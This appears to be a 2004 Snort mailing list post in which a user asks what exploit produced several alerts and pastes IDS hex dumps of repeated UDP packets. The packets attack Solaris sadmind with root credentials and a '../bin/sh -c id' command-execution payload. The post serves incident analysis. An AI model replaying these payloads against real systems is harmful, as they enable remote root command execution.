Snort mailing list archives
Suspicious Traffic
From: "ISP Toolz" <kevin () isptoolz com>
Date: Thu, 24 Jun 2004 20:25:52 -0400
Have any of you seen any traffic similar to this or do you know what exploit or script that was used to try and
overflow this system. Thanks.
Generated by ACID v0.9.6b23 on Thu, 24 Jun 2004 02:46:20 -0400
------------------------------------------------------------------------------
#(1 - 33320) [2004-06-21 12:33:33] [snort/2256] RPC sadmind query with root credentials attempt UDP
IPv4: 207.36.196.39 -> 68.82.247.65
hlen=5 TOS=0 dlen=1476 ID=14454 flags=0 offset=0 TTL=49 chksum=15571
UDP: port=60730 -> dport: 32770 len=1456
Payload: length = 1448
000 : F9 7B 0C 15 00 00 00 00 00 00 00 02 00 01 87 88 .{..............
010 : 00 00 00 0A 00 00 00 01 00 00 00 01 00 00 00 1C ................
020 : 40 D7 86 85 00 00 00 07 65 78 70 6C 6F 69 74 00 @.......exploit.
030 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
040 : 00 00 00 00 40 D7 86 89 00 07 45 DF 00 00 00 00 ....@.....E.....
050 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
060 : 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 ................
070 : 00 00 00 04 00 00 00 00 00 00 00 04 7F 00 00 01 ...............
080 : 00 01 87 88 00 00 00 0A 00 00 00 04 7F 00 00 01 ...............
090 : 00 01 87 88 00 00 00 0A 00 00 00 11 00 00 00 1E ................
0a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0b0 : 00 00 00 3B 65 78 70 6C 6F 69 74 00 00 00 00 00 ...;exploit.....
0c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0f0 : 00 00 00 06 73 79 73 74 65 6D 00 00 00 00 00 15 ....system......
100 : 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 62 ../../../../../b
110 : 69 6E 2F 73 68 00 00 00 00 00 04 1A 00 00 00 0E in/sh...........
120 : 41 44 4D 5F 46 57 5F 56 45 52 53 49 4F 4E 00 00 ADM_FW_VERSION..
130 : 00 00 00 03 00 00 00 04 00 00 00 01 00 00 00 00 ................
140 : 00 00 00 00 00 00 00 08 41 44 4D 5F 4C 41 4E 47 ........ADM_LANG
150 : 00 00 00 09 00 00 00 02 00 00 00 01 43 00 00 00 ............C...
160 : 00 00 00 00 00 00 00 00 00 00 00 0D 41 44 4D 5F ............ADM_
170 : 52 45 51 55 45 53 54 49 44 00 00 00 00 00 00 09 REQUESTID.......
180 : 00 00 00 12 00 00 00 11 30 38 31 30 3A 31 30 31 ........0810:101
190 : 30 31 30 31 30 31 30 3A 31 00 00 00 00 00 00 00 0101010:1.......
1a0 : 00 00 00 00 00 00 00 09 41 44 4D 5F 43 4C 41 53 ........ADM_CLAS
1b0 : 53 00 00 00 00 00 00 09 00 00 00 07 00 00 00 06 S...............
1c0 : 73 79 73 74 65 6D 00 00 00 00 00 00 00 00 00 00 system..........
1d0 : 00 00 00 0E 41 44 4D 5F 43 4C 41 53 53 5F 56 45 ....ADM_CLASS_VE
1e0 : 52 53 00 00 00 00 00 09 00 00 00 04 00 00 00 03 RS..............
1f0 : 32 2E 31 00 00 00 00 00 00 00 00 00 00 00 00 0A 2.1.............
200 : 41 44 4D 5F 4D 45 54 48 4F 44 00 00 00 00 00 09 ADM_METHOD......
210 : 00 00 00 16 00 00 00 15 2E 2E 2F 2E 2E 2F 2E 2E ........../../..
220 : 2F 2E 2E 2F 2E 2E 2F 62 69 6E 2F 73 68 00 00 00 /../../bin/sh...
230 : 00 00 00 00 00 00 00 00 00 00 00 08 41 44 4D 5F ............ADM_
240 : 48 4F 53 54 00 00 00 09 00 00 00 3C 00 00 00 3B HOST.......<...;
250 : 65 78 70 6C 6F 69 74 00 00 00 00 00 00 00 00 00 exploit.........
260 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
270 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
280 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
290 : 00 00 00 00 00 00 00 0F 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE
2a0 : 4E 54 5F 48 4F 53 54 00 00 00 00 09 00 00 00 08 NT_HOST.........
2b0 : 00 00 00 07 65 78 70 6C 6F 69 74 00 00 00 00 00 ....exploit.....
2c0 : 00 00 00 00 00 00 00 11 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE
2d0 : 4E 54 5F 44 4F 4D 41 49 4E 00 00 00 00 00 00 09 NT_DOMAIN.......
2e0 : 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 ................
2f0 : 00 00 00 11 41 44 4D 5F 54 49 4D 45 4F 55 54 5F ....ADM_TIMEOUT_
300 : 50 41 52 4D 53 00 00 00 00 00 00 09 00 00 00 1C PARMS...........
310 : 00 00 00 1B 54 54 4C 3D 30 20 50 54 4F 3D 32 30 ....TTL=0 PTO=20
320 : 20 50 43 4E 54 3D 32 20 50 44 4C 59 3D 33 30 00 PCNT=2 PDLY=30.
330 : 00 00 00 00 00 00 00 00 00 00 00 09 41 44 4D 5F ............ADM_
340 : 46 45 4E 43 45 00 00 00 00 00 00 09 00 00 00 00 FENCE...........
350 : 00 00 00 00 00 00 00 00 00 00 00 01 58 00 00 00 ............X...
360 : 00 00 00 09 00 00 00 03 00 00 00 02 2D 63 00 00 ............-c..
370 : 00 00 00 00 00 00 00 00 00 00 00 01 59 00 00 00 ............Y...
380 : 00 00 00 09 00 00 02 01 00 00 02 00 69 64 00 00 ............id..
390 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
400 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
420 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
430 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
440 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
450 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
460 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
470 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
480 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
490 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
500 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
510 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
520 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
530 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
540 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
550 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
560 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
570 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
580 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
590 : 00 00 00 00 00 00 00 10 6E 65 74 6D 67 74 5F 65 ........netmgt_e
5a0 : 6E 64 6F 66 61 72 67 73 ndofargs
------------------------------------------------------------------------------
#(1 - 33321) [2004-06-21 12:33:37] [snort/2256] RPC sadmind query with root credentials attempt UDP
IPv4: 207.36.196.39 -> 68.82.247.65
hlen=5 TOS=0 dlen=1476 ID=14863 flags=0 offset=0 TTL=49 chksum=15162
UDP: port=60732 -> dport: 32771 len=1456
Payload: length = 1448
000 : 6E 3E AA B1 00 00 00 00 00 00 00 02 00 01 87 88 n>..............
010 : 00 00 00 0A 00 00 00 01 00 00 00 01 00 00 00 1C ................
020 : 40 D7 86 89 00 00 00 07 65 78 70 6C 6F 69 74 00 @.......exploit.
030 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
040 : 00 00 00 00 40 D7 86 8D 00 07 45 DF 00 00 00 00 ....@.....E.....
050 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
060 : 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 ................
070 : 00 00 00 04 00 00 00 00 00 00 00 04 7F 00 00 01 ...............
080 : 00 01 87 88 00 00 00 0A 00 00 00 04 7F 00 00 01 ...............
090 : 00 01 87 88 00 00 00 0A 00 00 00 11 00 00 00 1E ................
0a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0b0 : 00 00 00 3B 65 78 70 6C 6F 69 74 00 00 00 00 00 ...;exploit.....
0c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0f0 : 00 00 00 06 73 79 73 74 65 6D 00 00 00 00 00 15 ....system......
100 : 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 62 ../../../../../b
110 : 69 6E 2F 73 68 00 00 00 00 00 04 1A 00 00 00 0E in/sh...........
120 : 41 44 4D 5F 46 57 5F 56 45 52 53 49 4F 4E 00 00 ADM_FW_VERSION..
130 : 00 00 00 03 00 00 00 04 00 00 00 01 00 00 00 00 ................
140 : 00 00 00 00 00 00 00 08 41 44 4D 5F 4C 41 4E 47 ........ADM_LANG
150 : 00 00 00 09 00 00 00 02 00 00 00 01 43 00 00 00 ............C...
160 : 00 00 00 00 00 00 00 00 00 00 00 0D 41 44 4D 5F ............ADM_
170 : 52 45 51 55 45 53 54 49 44 00 00 00 00 00 00 09 REQUESTID.......
180 : 00 00 00 12 00 00 00 11 30 38 31 30 3A 31 30 31 ........0810:101
190 : 30 31 30 31 30 31 30 3A 31 00 00 00 00 00 00 00 0101010:1.......
1a0 : 00 00 00 00 00 00 00 09 41 44 4D 5F 43 4C 41 53 ........ADM_CLAS
1b0 : 53 00 00 00 00 00 00 09 00 00 00 07 00 00 00 06 S...............
1c0 : 73 79 73 74 65 6D 00 00 00 00 00 00 00 00 00 00 system..........
1d0 : 00 00 00 0E 41 44 4D 5F 43 4C 41 53 53 5F 56 45 ....ADM_CLASS_VE
1e0 : 52 53 00 00 00 00 00 09 00 00 00 04 00 00 00 03 RS..............
1f0 : 32 2E 31 00 00 00 00 00 00 00 00 00 00 00 00 0A 2.1.............
200 : 41 44 4D 5F 4D 45 54 48 4F 44 00 00 00 00 00 09 ADM_METHOD......
210 : 00 00 00 16 00 00 00 15 2E 2E 2F 2E 2E 2F 2E 2E ........../../..
220 : 2F 2E 2E 2F 2E 2E 2F 62 69 6E 2F 73 68 00 00 00 /../../bin/sh...
230 : 00 00 00 00 00 00 00 00 00 00 00 08 41 44 4D 5F ............ADM_
240 : 48 4F 53 54 00 00 00 09 00 00 00 3C 00 00 00 3B HOST.......<...;
250 : 65 78 70 6C 6F 69 74 00 00 00 00 00 00 00 00 00 exploit.........
260 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
270 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
280 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
290 : 00 00 00 00 00 00 00 0F 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE
2a0 : 4E 54 5F 48 4F 53 54 00 00 00 00 09 00 00 00 08 NT_HOST.........
2b0 : 00 00 00 07 65 78 70 6C 6F 69 74 00 00 00 00 00 ....exploit.....
2c0 : 00 00 00 00 00 00 00 11 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE
2d0 : 4E 54 5F 44 4F 4D 41 49 4E 00 00 00 00 00 00 09 NT_DOMAIN.......
2e0 : 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 ................
2f0 : 00 00 00 11 41 44 4D 5F 54 49 4D 45 4F 55 54 5F ....ADM_TIMEOUT_
300 : 50 41 52 4D 53 00 00 00 00 00 00 09 00 00 00 1C PARMS...........
310 : 00 00 00 1B 54 54 4C 3D 30 20 50 54 4F 3D 32 30 ....TTL=0 PTO=20
320 : 20 50 43 4E 54 3D 32 20 50 44 4C 59 3D 33 30 00 PCNT=2 PDLY=30.
330 : 00 00 00 00 00 00 00 00 00 00 00 09 41 44 4D 5F ............ADM_
340 : 46 45 4E 43 45 00 00 00 00 00 00 09 00 00 00 00 FENCE...........
350 : 00 00 00 00 00 00 00 00 00 00 00 01 58 00 00 00 ............X...
360 : 00 00 00 09 00 00 00 03 00 00 00 02 2D 63 00 00 ............-c..
370 : 00 00 00 00 00 00 00 00 00 00 00 01 59 00 00 00 ............Y...
380 : 00 00 00 09 00 00 02 01 00 00 02 00 69 64 00 00 ............id..
390 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
400 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
420 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
430 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
440 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
450 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
460 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
470 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
480 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
490 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
500 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
510 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
520 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
530 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
540 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
550 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
560 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
570 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
580 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
590 : 00 00 00 00 00 00 00 10 6E 65 74 6D 67 74 5F 65 ........netmgt_e
5a0 : 6E 64 6F 66 61 72 67 73 ndofargs
------------------------------------------------------------------------------
#(1 - 33322) [2004-06-21 12:33:42] [snort/2256] RPC sadmind query with root credentials attempt UDP
IPv4: 207.36.196.39 -> 68.82.247.65
hlen=5 TOS=0 dlen=1476 ID=15355 flags=0 offset=0 TTL=49 chksum=14670
UDP: port=60734 -> dport: 32772 len=1456
Payload: length = 1448
000 : 9C 3F DC 06 00 00 00 00 00 00 00 02 00 01 87 88 .?..............
010 : 00 00 00 0A 00 00 00 01 00 00 00 01 00 00 00 1C ................
020 : 40 D7 86 8E 00 00 00 07 65 78 70 6C 6F 69 74 00 @.......exploit.
030 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
040 : 00 00 00 00 40 D7 86 92 00 07 45 DF 00 00 00 00 ....@.....E.....
050 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
060 : 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 ................
070 : 00 00 00 04 00 00 00 00 00 00 00 04 7F 00 00 01 ...............
080 : 00 01 87 88 00 00 00 0A 00 00 00 04 7F 00 00 01 ...............
090 : 00 01 87 88 00 00 00 0A 00 00 00 11 00 00 00 1E ................
0a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0b0 : 00 00 00 3B 65 78 70 6C 6F 69 74 00 00 00 00 00 ...;exploit.....
0c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0f0 : 00 00 00 06 73 79 73 74 65 6D 00 00 00 00 00 15 ....system......
100 : 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 62 ../../../../../b
110 : 69 6E 2F 73 68 00 00 00 00 00 04 1A 00 00 00 0E in/sh...........
120 : 41 44 4D 5F 46 57 5F 56 45 52 53 49 4F 4E 00 00 ADM_FW_VERSION..
130 : 00 00 00 03 00 00 00 04 00 00 00 01 00 00 00 00 ................
140 : 00 00 00 00 00 00 00 08 41 44 4D 5F 4C 41 4E 47 ........ADM_LANG
150 : 00 00 00 09 00 00 00 02 00 00 00 01 43 00 00 00 ............C...
160 : 00 00 00 00 00 00 00 00 00 00 00 0D 41 44 4D 5F ............ADM_
170 : 52 45 51 55 45 53 54 49 44 00 00 00 00 00 00 09 REQUESTID.......
180 : 00 00 00 12 00 00 00 11 30 38 31 30 3A 31 30 31 ........0810:101
190 : 30 31 30 31 30 31 30 3A 31 00 00 00 00 00 00 00 0101010:1.......
1a0 : 00 00 00 00 00 00 00 09 41 44 4D 5F 43 4C 41 53 ........ADM_CLAS
1b0 : 53 00 00 00 00 00 00 09 00 00 00 07 00 00 00 06 S...............
1c0 : 73 79 73 74 65 6D 00 00 00 00 00 00 00 00 00 00 system..........
1d0 : 00 00 00 0E 41 44 4D 5F 43 4C 41 53 53 5F 56 45 ....ADM_CLASS_VE
1e0 : 52 53 00 00 00 00 00 09 00 00 00 04 00 00 00 03 RS..............
1f0 : 32 2E 31 00 00 00 00 00 00 00 00 00 00 00 00 0A 2.1.............
200 : 41 44 4D 5F 4D 45 54 48 4F 44 00 00 00 00 00 09 ADM_METHOD......
210 : 00 00 00 16 00 00 00 15 2E 2E 2F 2E 2E 2F 2E 2E ........../../..
220 : 2F 2E 2E 2F 2E 2E 2F 62 69 6E 2F 73 68 00 00 00 /../../bin/sh...
230 : 00 00 00 00 00 00 00 00 00 00 00 08 41 44 4D 5F ............ADM_
240 : 48 4F 53 54 00 00 00 09 00 00 00 3C 00 00 00 3B HOST.......<...;
250 : 65 78 70 6C 6F 69 74 00 00 00 00 00 00 00 00 00 exploit.........
260 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
270 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
280 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
290 : 00 00 00 00 00 00 00 0F 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE
2a0 : 4E 54 5F 48 4F 53 54 00 00 00 00 09 00 00 00 08 NT_HOST.........
2b0 : 00 00 00 07 65 78 70 6C 6F 69 74 00 00 00 00 00 ....exploit.....
2c0 : 00 00 00 00 00 00 00 11 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE
2d0 : 4E 54 5F 44 4F 4D 41 49 4E 00 00 00 00 00 00 09 NT_DOMAIN.......
2e0 : 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 ................
2f0 : 00 00 00 11 41 44 4D 5F 54 49 4D 45 4F 55 54 5F ....ADM_TIMEOUT_
300 : 50 41 52 4D 53 00 00 00 00 00 00 09 00 00 00 1C PARMS...........
310 : 00 00 00 1B 54 54 4C 3D 30 20 50 54 4F 3D 32 30 ....TTL=0 PTO=20
320 : 20 50 43 4E 54 3D 32 20 50 44 4C 59 3D 33 30 00 PCNT=2 PDLY=30.
330 : 00 00 00 00 00 00 00 00 00 00 00 09 41 44 4D 5F ............ADM_
340 : 46 45 4E 43 45 00 00 00 00 00 00 09 00 00 00 00 FENCE...........
350 : 00 00 00 00 00 00 00 00 00 00 00 01 58 00 00 00 ............X...
360 : 00 00 00 09 00 00 00 03 00 00 00 02 2D 63 00 00 ............-c..
370 : 00 00 00 00 00 00 00 00 00 00 00 01 59 00 00 00 ............Y...
380 : 00 00 00 09 00 00 02 01 00 00 02 00 69 64 00 00 ............id..
390 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
400 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
420 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
430 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
440 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
450 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
460 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
470 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
480 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
490 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
500 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
510 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
520 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
530 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
540 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
550 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
560 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
570 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
580 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
590 : 00 00 00 00 00 00 00 10 6E 65 74 6D 67 74 5F 65 ........netmgt_e
5a0 : 6E 64 6F 66 61 72 67 73 ndofargs
------------------------------------------------------------------------------
#(1 - 33323) [2004-06-21 12:33:46] [snort/2256] RPC sadmind query with root credentials attempt UDP
IPv4: 207.36.196.39 -> 68.82.247.65
hlen=5 TOS=0 dlen=1476 ID=15774 flags=0 offset=0 TTL=49 chksum=14251
UDP: port=60736 -> dport: 32773 len=1456
Payload: length = 1448
000 : D4 F6 08 48 00 00 00 00 00 00 00 02 00 01 87 88 ...H............
010 : 00 00 00 0A 00 00 00 01 00 00 00 01 00 00 00 1C ................
020 : 40 D7 86 93 00 00 00 07 65 78 70 6C 6F 69 74 00 @.......exploit.
030 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
040 : 00 00 00 00 40 D7 86 97 00 07 45 DF 00 00 00 00 ....@.....E.....
050 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
060 : 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 ................
070 : 00 00 00 04 00 00 00 00 00 00 00 04 7F 00 00 01 ...............
080 : 00 01 87 88 00 00 00 0A 00 00 00 04 7F 00 00 01 ...............
090 : 00 01 87 88 00 00 00 0A 00 00 00 11 00 00 00 1E ................
0a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0b0 : 00 00 00 3B 65 78 70 6C 6F 69 74 00 00 00 00 00 ...;exploit.....
0c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0f0 : 00 00 00 06 73 79 73 74 65 6D 00 00 00 00 00 15 ....system......
100 : 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 62 ../../../../../b
110 : 69 6E 2F 73 68 00 00 00 00 00 04 1A 00 00 00 0E in/sh...........
120 : 41 44 4D 5F 46 57 5F 56 45 52 53 49 4F 4E 00 00 ADM_FW_VERSION..
130 : 00 00 00 03 00 00 00 04 00 00 00 01 00 00 00 00 ................
140 : 00 00 00 00 00 00 00 08 41 44 4D 5F 4C 41 4E 47 ........ADM_LANG
150 : 00 00 00 09 00 00 00 02 00 00 00 01 43 00 00 00 ............C...
160 : 00 00 00 00 00 00 00 00 00 00 00 0D 41 44 4D 5F ............ADM_
170 : 52 45 51 55 45 53 54 49 44 00 00 00 00 00 00 09 REQUESTID.......
180 : 00 00 00 12 00 00 00 11 30 38 31 30 3A 31 30 31 ........0810:101
190 : 30 31 30 31 30 31 30 3A 31 00 00 00 00 00 00 00 0101010:1.......
1a0 : 00 00 00 00 00 00 00 09 41 44 4D 5F 43 4C 41 53 ........ADM_CLAS
1b0 : 53 00 00 00 00 00 00 09 00 00 00 07 00 00 00 06 S...............
1c0 : 73 79 73 74 65 6D 00 00 00 00 00 00 00 00 00 00 system..........
1d0 : 00 00 00 0E 41 44 4D 5F 43 4C 41 53 53 5F 56 45 ....ADM_CLASS_VE
1e0 : 52 53 00 00 00 00 00 09 00 00 00 04 00 00 00 03 RS..............
1f0 : 32 2E 31 00 00 00 00 00 00 00 00 00 00 00 00 0A 2.1.............
200 : 41 44 4D 5F 4D 45 54 48 4F 44 00 00 00 00 00 09 ADM_METHOD......
210 : 00 00 00 16 00 00 00 15 2E 2E 2F 2E 2E 2F 2E 2E ........../../..
220 : 2F 2E 2E 2F 2E 2E 2F 62 69 6E 2F 73 68 00 00 00 /../../bin/sh...
230 : 00 00 00 00 00 00 00 00 00 00 00 08 41 44 4D 5F ............ADM_
240 : 48 4F 53 54 00 00 00 09 00 00 00 3C 00 00 00 3B HOST.......<...;
250 : 65 78 70 6C 6F 69 74 00 00 00 00 00 00 00 00 00 exploit.........
260 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
270 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
280 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
290 : 00 00 00 00 00 00 00 0F 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE
2a0 : 4E 54 5F 48 4F 53 54 00 00 00 00 09 00 00 00 08 NT_HOST.........
2b0 : 00 00 00 07 65 78 70 6C 6F 69 74 00 00 00 00 00 ....exploit.....
2c0 : 00 00 00 00 00 00 00 11 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE
2d0 : 4E 54 5F 44 4F 4D 41 49 4E 00 00 00 00 00 00 09 NT_DOMAIN.......
2e0 : 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 ................
2f0 : 00 00 00 11 41 44 4D 5F 54 49 4D 45 4F 55 54 5F ....ADM_TIMEOUT_
300 : 50 41 52 4D 53 00 00 00 00 00 00 09 00 00 00 1C PARMS...........
310 : 00 00 00 1B 54 54 4C 3D 30 20 50 54 4F 3D 32 30 ....TTL=0 PTO=20
